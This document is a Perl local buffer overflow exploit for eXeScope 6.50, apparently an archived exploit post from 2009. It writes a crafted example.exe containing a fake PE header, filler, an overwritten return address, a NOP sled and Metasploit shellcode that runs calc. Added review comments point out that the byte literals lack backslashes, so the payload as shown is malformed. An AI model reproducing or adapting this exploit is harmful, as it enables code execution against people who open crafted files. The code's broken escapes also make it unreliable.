
# Title : eXeScope 6.50 Local Buffer Overflow Exploit
# Published : 2009-03-23
# Author : Koshi


#!/usr/bin/perl
#
# eXeScope 6.50 Local Buffer Overflow Exploit
#
# Download eXeScope 6.50 at:
# http://hp.vector.co.jp/authors/VA003525/eXeSc650.zip
#
# Exploit by: Koshi ( heykoshi@gmail.com )
# 

use strict;
use warnings;

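# Assembles the contents of example.exe as one byte string, in this order:
# $headers . $buff0 . $eip . $sled . $shellcode . $buff1 (see $datas below),
# then writes it out in binary mode.
#
# NOTE(review): as reproduced on this page the quoted literals contain no
# backslash characters, so Perl reads each "xNN" as three plain ASCII
# characters rather than one byte. The lengths the comments describe
# ("Size=161", the 4-byte address) therefore do not match what
# length() returns for these literals as written.
my $headers = 
	"x4Dx5Ax90x00x03x00x00x00x04x00x00x00xFFxFFx00x00".
	"xB8x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00".
	"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
	"x00x00x00x00x00x00x00x00x00x00x00x00xB8x00x00x00".
	"x0Ex1FxBAx0Ex00xB4x09xCDx21xB8x01x4CxCDx21x54x68".
	"x69x73x20x70x72x6Fx67x72x61x6Dx20x63x61x6Ex6Ex6F".
	"x74x20x62x65x20x72x75x6Ex20x65x69x74x68x65x72x20".
	"x77x61x79x21x21x0Dx0Dx0Ax24x00x00x00x00x00x00x00".
	"x8Fx8AxF9xDBxCBxEBx97x88xCBxEBx97x88xCBxEBx97x88".
	"x48xF7x99x88xCAxEBx97x88xA2xF4x9Ex88xCAxEBx97x88".
	"x22xF4x9Ax88xCAxEBx97x88x52x69x63x68xCBxEBx97x88".
	"x00x00x00x00x00x00x00x00x50x45x00x00x4Cx01xFFx00".
	"xABxBAx5Cx49x00x00x00x00x00x00x00x00xE0x00xF0x01".
	"x00"x224;                       # pad the header block out with NUL-style filler


# win32_exec -  EXITFUNC=process CMD=calc Size=161 Encoder=ShikataGaNai http://metasploit.com
my $shellcode =
	"xb8x82x0ax8dx38xd9xc6xd9x74x24xf4x5ax29xc9xb1x23".
	"x31x42x12x83xeaxfcx03xc0x04x6fxcdx38xf0x2bx2exc0".
	"x01x3fx6bxfcx8ax43x71x84x8dx54xf2x3bx96x21x5axe3".
	"xa7xdex2cx68x93xabxaex80xedx6bx29xf0x8axacx3ex0f".
	"x52xe6xb2x0ex96x1cx38x2bx42xc7xc5x3ex8fx8cx99xe4".
	"x4ex78x43x6fx5cx35x07x30x41xc8xfcx45x65x41x03xb2".
	"x1fx09x20x40xe3x83xe8x2cx68xa3xd8x29xaex5cx15xba".
	"x6fx91xaexccx73x04x3bx44x84xbdx35x1fx14xf1x46x1f".
	"x15x79x2ex23x4ax4cx59x3bx22x27x5dx38x0ax4cxcex56".
	"xf5x6bx0cxd5x61x14x2fx93x7cx73x2fx44xe3x1axa3xe9".
	"xe4";

my $buff0 = "A"x4148;             # filler preceding the overwritten value
my $eip   = "x58x32x4Dx00"; # 004d3258 - eXeScope.exe (address given by the author)
my $sled  = "x90"x20;             # 20-unit sled placed directly before $shellcode
my $len   = 6028 - length($shellcode);  # so that $shellcode . $buff1 totals 6028 units
my $buff1 = "A"x$len;             # trailing filler
my $datas = $headers.$buff0.$eip.$sled.$shellcode.$buff1;

# Three-argument open with an explicit mode and error checks. The original
# two-argument, unchecked open() silently continued on failure, and buffered
# write errors only surface at close(), so both are checked here.
my $outfile = 'example.exe';
open(my $files, '>', $outfile) or die "open $outfile: $!";
binmode $files;
print {$files} $datas or die "write $outfile: $!";
close($files) or die "close $outfile: $!";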
